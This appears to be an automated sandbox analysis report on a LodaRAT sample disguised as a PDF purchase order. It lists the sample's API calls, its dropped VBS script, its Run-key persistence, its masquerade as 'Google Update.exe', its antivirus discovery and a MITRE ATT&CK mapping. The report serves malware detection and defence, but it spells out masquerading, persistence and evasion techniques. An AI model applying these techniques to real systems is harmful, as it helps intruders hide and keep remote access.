              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeFile read: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe"
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CF20F6 LoadLibraryA,GetProcAddress,1_2_00CF20F6
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00D205A8 push ss; ret 1_2_00D205A9
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB7795 push ecx; ret 1_2_00CB77A8
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB18F0 push cs; retf 1_2_00CB18F5
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeFile created: C:\Users\user\AppData\Roaming\Windata\Google Update.exeJump to dropped file
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KKRBIXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KKRBIXJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool users
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
              Uses an obfuscated file name to hide its real file extension (double extension)
              Source: Possible double extension: pdf.exeStatic PE information: Purchase Order Supplies.Pdf.exe
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00CAF78E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CF7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00CF7F0E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00CB1E5A
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeWindow / User API: threadDelayed 6867Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeWindow / User API: foregroundWindowGot 1772Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeAPI coverage: 6.2 %
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe TID: 7040Thread sleep time: -68670s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeThread sleep count: Count: 6867 delay: -10Jump to behavior
              Source: Yara matchFile source: 00000003.00000002.2476240013.0000000003460000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2471256103.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2471256103.00000000030D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2485820292.0000000004D11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Purchase Order Supplies.Pdf.exe PID: 7036, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6900, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, type: DROPPED
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CADD92 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00CADD92
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00CE2044
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00CE219F
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00CE24A9
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00CD6B3F
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00CD6E4A
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CDF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00CDF350
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CDFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00CDFDD2
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CDFD47 FindFirstFileW,FindClose,1_2_00CDFD47
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00CAE47B
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2476015733.00000000013AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2476015733.00000000013AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %SystemRoot%\System32\winrnr.dllHyper-V RAW
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2476015733.00000000013AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeAPI call chain: ExitProcess graph end nodegraph_1-110108
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeAPI call chain: ExitProcess graph end nodegraph_1-110518
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE703C BlockInput,1_2_00CE703C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,1_2_00C9374E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CC46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,1_2_00CC46D0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CF20F6 LoadLibraryA,GetProcAddress,1_2_00CF20F6
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CBA937 GetProcessHeap,1_2_00CBA937
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB8E19 SetUnhandledExceptionFilter,1_2_00CB8E19
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00CB8E3C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CCBE95 LogonUserW,1_2_00CCBE95
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,1_2_00C9374E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD4B52 SendInput,keybd_event,1_2_00CD4B52
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD7DD5 mouse_event,1_2_00CD7DD5
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CCB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00CCB398
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CCBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00CCBE31
              Source: Purchase Order Supplies.Pdf.exeBinary or memory string: Shell_TrayWnd
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB7254 cpuid 1_2_00CB7254
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB40DA GetSystemTimeAsFileTime,__aulldiv,1_2_00CB40DA
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00D0C146 GetUserNameW,1_2_00D0C146
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CC2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00CC2C3C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00CAE47B
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2476015733.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Supplies.Pdf.exe, 00000001.00000002.2485288040.0000000004CA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LodaRAT
              Source: Yara matchFile source: Process Memory Space: Purchase Order Supplies.Pdf.exe PID: 7036, type: MEMORYSTR
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2485288040.0000000004CA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
              Source: Purchase Order Supplies.Pdf.exeBinary or memory string: WIN_XP
              Source: Purchase Order Supplies.Pdf.exeBinary or memory string: WIN_XPe
              Source: Purchase Order Supplies.Pdf.exeBinary or memory string: WIN_VISTA
              Source: Purchase Order Supplies.Pdf.exeBinary or memory string: WIN_7
              Source: Purchase Order Supplies.Pdf.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: Process Memory Space: Purchase Order Supplies.Pdf.exe PID: 7036, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LodaRAT
              Source: Yara matchFile source: Process Memory Space: Purchase Order Supplies.Pdf.exe PID: 7036, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00CE91DC
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00CE96E2

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		2
              Valid Accounts              		11
              Windows Management Instrumentation              		11
              Scripting              		1
              Exploitation for Privilege Escalation              		1
              Disable or Modify Tools              		21
              Input Capture              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol21
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts              		2
              Valid Accounts              		121
              Obfuscated Files or Information              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		SteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder              		21
              Access Token Manipulation              		1
              Software Packing              		NTDS17
              System Information Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
              Process Injection              		1
              DLL Side-Loading              		LSA Secrets51
              Security Software Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Registry Run Keys / Startup Folder              		21
              Masquerading              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Valid Accounts              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
              Virtualization/Sandbox Evasion              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
